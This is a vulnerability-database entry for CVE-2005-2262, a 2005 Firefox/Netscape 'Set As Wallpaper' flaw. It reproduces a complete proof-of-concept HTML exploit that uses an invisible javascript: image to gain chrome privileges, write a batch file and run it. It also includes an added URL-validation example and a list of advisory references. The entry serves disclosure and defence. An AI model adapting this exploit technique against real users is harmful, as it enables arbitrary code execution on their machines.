Mozilla Firefox/Netscape Code Execution Vulnerability

Vulnerability ID 1108929 Vulnerability type
Published 2005-07-13 Updated 2005-10-20
CVE ID CVE-2005-2262
CNNVD-ID CNNVD-200507-155
Platform Windows CVSS score 5.1
|Vulnerability source
https://www.exploit-db.com/exploits/1102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-155
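|Vulnerability details
Firefox and Netscape are both web browsers. Firefox 1.0.3 and 1.0.4 and Netscape 8.0.2 contain a code execution vulnerability. A remote attacker can trick a user into setting an image as the desktop background in the browser, when the image's URL is in fact a javascript: URL containing an eval statement.
|Exploit (EXP)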
// Exploit by Michael Krax
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firewalling - Proof-of-Concept</title>
<script>
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
<br><br>
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
<br><br>
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
that shows a directory listing in a dos box (Windows only).
<br><br>

<div style="position:relative; width:300px; height:250px;">
<img src="javascript:/*-----------------------------*/eval('if(document.location.href.
substr(0,6)=='chrome'){netscape.security.PrivilegeManager.enablePrivilege('
UniversalXPConnect');file=Components.classes['@mozilla.org/file/local;1'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\
booom.bat');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes['@mozilla.org/network/file-output-stream;
1'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08|0x20,420,0);output='@ECHO OFF\n:BEGIN\nCLS\nDIR\nPAUSE
\n:END';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}')" width="300" height="250"  border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="http://www.milw0rm.com/images/logo.png" width="300" height="250"  border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()">
</div>
</div>
</body>

</html>

# milw0rm.com [2005-07-13]
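
The PoC text above states that the "Set As Wallpaper" dialog takes the image URL as a parameter without validating it. The following is an added example of the missing check, not code from the original page, the exploit author or Mozilla's actual fix; the function name `vetImageUrl`, the scheme allowlist and the `example.test` URLs are assumptions made for illustration.

```javascript
// Added example, not Mozilla's patch: scheme allowlist for an image URL that
// is about to be passed to a privileged (chrome) dialog.

// Assumption: the dialog only ever needs to fetch image bytes over these schemes.
const ALLOWED_IMAGE_SCHEMES = new Set(["http:", "https:"]);

// Resolve `rawSrc` against the page URL and decide whether it may be passed on.
// Returns { ok, url, reason }; `url` is the canonical form the privileged code
// should use, never the raw attribute value.
function vetImageUrl(rawSrc, pageUrl) {
  if (typeof rawSrc !== "string" || rawSrc.length === 0) {
    return { ok: false, url: null, reason: "empty or non-string src" };
  }
  let parsed;
  try {
    // The WHATWG parser trims leading control characters and spaces, drops
    // embedded tabs/newlines and lowercases the scheme, so the check sees
    // the same scheme the browser would act on.
    parsed = new URL(rawSrc, pageUrl);
  } catch (err) {
    return { ok: false, url: null, reason: "unparseable URL" };
  }
  if (!ALLOWED_IMAGE_SCHEMES.has(parsed.protocol)) {
    return { ok: false, url: null, reason: "scheme not allowed: " + parsed.protocol };
  }
  return { ok: true, url: parsed.href, reason: null };
}

// Constructed sample inputs (hypothetical page and image URLs).
const PAGE = "http://example.test/gallery/index.html";
const SAMPLES = [
  "logo.png",                               // relative, resolves to http:
  "https://example.test/images/logo.png",   // absolute, allowed
  "javascript:/*-*/void(0)",                // script URL with a comment prefix
  " \tJaVa\nScRiPt:void(0)",                // same scheme, obfuscated
  "data:image/png;base64,AAAA",             // not on the allowlist
  "chrome://browser/content/browser.xul",   // privileged scheme
];

function vetAll() {
  return SAMPLES.map((src) => ({ src, ...vetImageUrl(src, PAGE) }));
}

for (const r of vetAll()) console.log(JSON.stringify(r));
```

Comparing the parsed scheme rather than a prefix of the raw string is what catches the mixed-case and whitespace-padded variants.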
|References

Source: www.mozilla.org
Link: http://www.mozilla.org/security/announce/mfsa2005-47.html
Source: MISC
Link: http://www.mikx.de/firewalling/
Source: BID
Name: 14242
Link: http://www.securityfocus.com/bid/14242
Source: MISC
Link: http://www.securiteam.com/securitynews/5ZP0E0UGAK.html
Source: REDHAT
Name: RHSA-2005:586
Link: http://www.redhat.com/support/errata/RHSA-2005-586.html
Source: SUSE
Name: SUSE-SA:2005:045
Link: http://www.novell.com/linux/security/advisories/2005_45_mozilla.html
Source: SUSE
Name: SUSE-SR:2005:018
Link: http://www.novell.com/linux/security/advisories/2005_18_sr.html
Source: MISC
Link: http://www.networksecurity.fi/advisories/netscape-multiple-issues.html
Source: VUPEN
Name: ADV-2005-1075
Link: http://www.frsirt.com/english/advisories/2005/1075
Source: CIAC
Name: P-252
Link: http://www.ciac.org/ciac/bulletins/p-252.shtml
Source: SECUNIA
Name: 16044
Link: http://secunia.com/advisories/16044
Source: SECUNIA
Name: 16043
Link: http://secunia.com/advisories/16043
Source: USGovernmentResource:oval:org.mitre.oval:def:100011
Name: oval:org.mitre.oval:def:100011
Link: http://oval.mitre.org/repository
